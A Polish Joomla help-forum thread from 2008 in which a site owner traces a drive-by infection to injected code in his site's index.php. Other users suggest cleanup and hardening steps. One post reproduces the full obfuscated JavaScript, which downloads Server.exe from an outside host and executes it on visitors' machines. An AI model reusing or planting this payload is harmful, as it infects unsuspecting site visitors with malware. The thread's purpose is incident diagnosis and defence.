PDA

Zobacz pełną wersję : dziwna infekcja



michalp
19-04-2008, 15:54
Witam,
jestem jeszcze niedoswiadczonym joomlistom ;) i byc moze moj problem wyda sie uzytkownikom tego forum banalny.
Ja niestety mam problem i nieumiem sobie z tym poradzic. Na forum znalazlem jedynie opisy jak zabezpieczyc sie, nigdzie natomiast nieznalazlem opisu rozwiazania. Otoz mam strone w joomli 1.0.13 pl utf8 (jeszcze czesciowo w trakcie tworzenia) i do tej pory (do czwartku) strona dzialala bez zarzutu.

Natomiast od 2 dni wchodzac na adres mojej strony wyswietla sie ona i bez ostrzezen automatycznie kopiuje (instaluje?) sie plik na pulpicie o nazwie server.exe . Co prawda sprawdzalem tylko pod IE6 ale na 4 roznych kompach i za kazdym razem wpisujac adres mojej strony potem okazuje sie ze na pulpicie jest plik server.exe.

Zrobilem pare bledow (teraz to wiem po analizie forum), ze nie zabezpieczylem plikow chmod na 444 i praktycznie nie interesowalem sie bezpieczenstwem.

Ale teraz moim problemem i pytaniem do forumowiczow jest, gdzie mam szukac bledu, gdzie moze byc fałszywy (zlosliwy) wpis, jakiego rodzaju moze byc to wpis i gdzie go szukac. Prosze o pomoc, jest to moja pierwsza strona i dopiero sie ucze joomli.
pozdrawiam i prosze o pomoc

inkos
19-04-2008, 21:06
Co do kwestii bezpieczenstwa to zapoznaj sie z tym dzialem forum. A co do problemu. Musisz recznie sprawdzic czy w plikach
templates\twoj szablon\index.php nie ma jakiegos "dodatkowego kodu" odpowiedzialnego za ten plik. Sprawdz tez inne pliki index i default zarowno html i php jakie sa w glownych podkatalogach czyli
administrator/
components/
i pozostalych.
Zawsze szukaj fragmentu kodu z tym exe-kiem lub ramek <iframe o wielkosci 1.px.

michalp
21-04-2008, 01:44
Dziękuję za pomoc, dowiedziałem co i gdzie szukać.
Po krótkim śledztwie znalazłem fałszywy wpis w pliku index.php w katalogu głównym. Po jego wykasowaniu działanie mojej joomli już nie budzi zastrzeżeń :)
Wpis był tresci:
"<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://www.mb21.co.kr/img/Server.exe";
var file="Server.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,9 7,105,108,105,97,110,44,122,104,97,110,44,99,109,1 00,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,115,61,34,99,109,100,46,10 1,120,101,34,59,116,114,121,123,118,97,114,32,97,1 00,111,61,40,100,111,99,117,109,101,110,116,46,99, 114,101,97,116,101,69,108,101,109,101,110,116,40,3 4,111,98,106,101,99,116,34,41,41,59,118,97,114,32, 100,61,49,59,97,100,111,46,115,101,116,65,116,116, 114,105,98,117,116,101,40,34,99,108,97,115,115,105 ,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67 ,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,5 1,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41, 59,118,97,114,32,101,61,49,59,118,97,114,32,120,10 9,108,61,97,100,111,46,67,114,101,97,116,101,79,98 ,106,101,99,116,40,34,77,105,99,114,111,115,111,10 2,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,11 8,97,114,32,102,61,49,59,118,97,114,32,108,110,61, 34,65,100,111,34,59,118,97,114,32,108,122,110,61,3 4,100,98,46,83,116,34,59,118,97,114,32,97,110,61,3 4,114,101,97,109,34,59,118,97,114,32,103,61,49,59, 118,97,114,32,97,115,61,97,100,111,46,99,114,101,9 7,116,101,111,98,106,101,99,116,40,108,110,43,108, 122,110,43,97,110,44,34,34,41,59,118,97,114,32,104 ,61,49,59,120,109,108,46,79,112,101,110,40,34,71,6 9,84,34,44,97,105,108,105,97,110,44,48,41,59,120,1 09,108,46,83,101,110,100,40,41,59,97,115,46,116,12 1,112,101,61,49,59,118,97,114,32,110,61,49,59,97,1 15,46,111,112,101,110,40,41,59,97,115,46,119,114,1 05,116,101,40,120,109,108,46,114,101,115,112,111,1 10,115,101,66,111,100,121,41,59,97,115,46,115,97,1 18,101,116,111,102,105,108,101,40,122,104,97,110,4 4,50,41,59,97,115,46,99,108,111,115,101,40,41,59,1 18,97,114,32,115,104,101,108,108,61,97,100,111,46, 99,114,101,97,116,101,111,98,106,101,99,116,40,34, 83,104,101,108,108,46,65,112,112,108,105,99,97,116 ,105,111,110,34,44,34,34,41,59,115,104,101,108,108 ,46,83,104,101,108,108,69,120,101,99,117,116,101,4 0,122,104,97,110,44,34,34,44,34,34,44,34,111,112,1 01,110,34,44,48,41,59,115,104,101,108,108,46,83,10 4,101,108,108,69,120,101,99,117,116,101,40,99,109, 100,115,115,44,34,32,47,99,32,100,101,108,32,47,83 ,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,3 4,44,34,111,112,101,110,34,44,48,41,59,125,99,97,1 16,99,104,40,101,41,123,125,59,60,47,115,99,114,10 5,112,116,62));
</script>"

Mam pytanie, co oznaczają - jaką funkcję mogą spełniać w skrypcie wpisane liczby w dc(sc..

zwiastun
21-04-2008, 02:23
Działanie Twojego Joomla zostało tyko na chwilę przywrócone, niestety. Strona jest shakowana. Podaj więcej info (wersja Joomla, zainstalowane komponenty)

michalp
21-04-2008, 03:08
Moja strona jest shakowana? :(
Myslalem, ze usuniecie znalezionego skryptu zalatwi sprawe, ale to by było zbyt proste i łatwe..
Skopiowałem całą zawartośc ftp na dysk, następnie poleceniem zjadz z tego folderu wyszukalem wszytskie pliki index.* i zobaczylem, ktore byly ostatnio modyfikowane (data, godzina), i w ten sposob znalazlem plik z dopisanym skryptem. Po usunieciu skryptu strona zaczela dzialac prawidlowo.
Tylko skoro jest shakowana, to co mam teraz wykonac?
Adres mojej strony to www.sterowniki-online.pl (http://www.sterowniki-online.pl) , podpięte do tej domeny sa takze www.sterownikionline.pl (http://www.sterownikionline.pl) i www.sterowniki-przemyslowe.pl (http://www.sterowniki-przemyslowe.pl)

Parametry mojej Joomla:
- joomla 1.0.13 JIE-utf8
- docman 1.4pl
- artbanner plus (info:Komponent został oparty na ArtBanners Component 2.0 Alpha napisanym przez Jonatas Eridani.Wersja 0.4 Create by Dino Porcaro)
- letterman
- wraper
- virtuemart (zainstalowany komponent, moduł, boty - ale nie skonfigurowany)
- fireboard (forum było skonfigurowane, ale odpięlem od guzika menu - obecnie brak linku na www do forum)

Co mam (powinienem zrobić) skoro strona shakowana? Odinstalowac wszystkie komponenty, moduły, boty i swieze zainstalowac? Na nowo postawic joomle (mam nadzieje ze to ostatecznosc)? czy jeszcze cos innego Jak sprawdzic czy rzeczywiscie shakowana? Co teraz powinienem zrobic - zalezy mi aby strona dzialala i byla "zdrowa"

prosze o pomoc

dkint
21-04-2008, 08:12
Witam

Może zacznij od zablokowania tego adresu w htaccess, a później zaktualizuj wszystkie dokładane komponenty i moduły do najnowszych wersji ...

pozdrawiam
Krzysiek

michalp
22-04-2008, 16:20
Tak jak pisalem powyżej, po usunieciu zlosliwego skryptu moja Jomla zaczęła prawidłowo działać i działa nadal.
Co do działań prewencyjnych:
- wpisalem zlosliwy adres url do pliku htaccess
- zablokowalem na serwerze hostingowym adres IP z którego nastąpiło włamanie (sprawdzilem logi)
- w joomli zmienilem Register Globals na OFF (było na ON)
- usunąłem (ale z ftp, nie z poziomu administratora, niepotrzebne komponenty, moduły itd),
- pozmienialem hasła do joomla i do ftp
Czy wobec powyższych czynnosci nadal jest podejrzenie ze moja strona moze szybko przestac dzialac i jest shakowana? Co jeszczed powinienem zrobic (poza aktualizacją do najnowszych wersji komponentow, modułów i botów)?

Przy okazji - usuwając z poziomu FTP czesc komponentow, chyba czegos za duzo usunałem (i błąd, ze nie z poziomu joomla nie usuwalem) np. teraz mam na stonie pobieralnie wykonaną w docmanie, ale z poziomu zaplecza joomli niewidac docmana w komponentach (w instalatorze jedynie jest puste miejsce tak jakby brakowalo tekstu), tak wiec niewidząc docmana w komponentach niemoge zarządzać plikami. Probowalem doinstalowac docmana - ale mi wywala komunikat ze musze najpierw odinstalowac starego docmana (a nnie widac go w spisie komponentow) - no ale ten konkretnie problem pewnie nalezy do innej kategorii joomla-forum.

kurtz
22-04-2008, 16:56
no, jechać na włączonych register_globals i się dziwić ...

zwiastun
22-04-2008, 18:05
Przede wszystkim zaktualizować do 1.0.15. Podobny "efekt" naprawiałem na jednej ze stron ostatnio ze 4 razy. Niestety, nie dało się zmienić niektórych wrażliwych ustawień serwera (register globals na ON i wyłączona możliwość zmiany lokalnie!, hehehe). Aktualizacja do 1.0.15 rozwiązała problem (może tylko na jakiś czas, ale haker dostawał się przez którąś z luk w 1.0.13, czego też sprawdzić nie można było, bo "admin" nie miał czas zajmować się problemem!)

stasio
22-04-2008, 21:36
Przede wszystkim zaktualizować do 1.0.15.
tym bardziej ze doszły mnie słuchy ze w 15 jest juz administracja w polskiej wersji... prawdaż to czy tylko żart ponury?

crazyluki
22-04-2008, 23:13
stasio: ciężko przeczytać?:P poszukać? no pewnie że jest już wydanie z polskim adminem:)

inkos
22-04-2008, 23:14
Stasio - looknij na pierwszą stronę joomla.pl a moze znajdziesz małe co nie co :D

stasio
22-04-2008, 23:55
wiem wiem ze jest :) tylko wiecie jakoś było trzeba zacząć temat popijawy... no wiecie w senie
"-a to serio jest 1.015 z polskim adminem?
-no serio!
-ło no to moze wyjmę kieliszki...
-no skoro juz masz to wyjmij..."

czyli co przystępujemy do aktualizacji joomlów do 15 :D

inkos
23-04-2008, 00:23
czyli co przystępujemy do aktualizacji joomlów do 15 :D
Że tak powiem wprost: się jeszcze pytasz czy lubisz turecki albo inny komunikat na swojej stronie.

stasio
23-04-2008, 13:00
hmmmm dopiero co na 14 przeszedłem :)
czyli co, nadpisujemy pliki bez configa :D

inkos
23-04-2008, 13:33
Tu już masz trochę mniej roboty. W ostateczności mogłoby zostać na chwilę ale warto skoczyć o numerek wyżej i mieć spokój na jakiś czas... ale przy tym nie zapominać o przyglądnięciu się tematom dotyczącym bezpieczeństwa na forum.joomla.org. Licho wie co się jeszcze moze pojawić.

stasio
23-04-2008, 17:24
nie nie bede ryzykował z infekcją, bo wiesz mnie wirusy lubią,... zaraz sie coś na 14 pojawi

komodore
28-03-2016, 00:47
Zamykam temat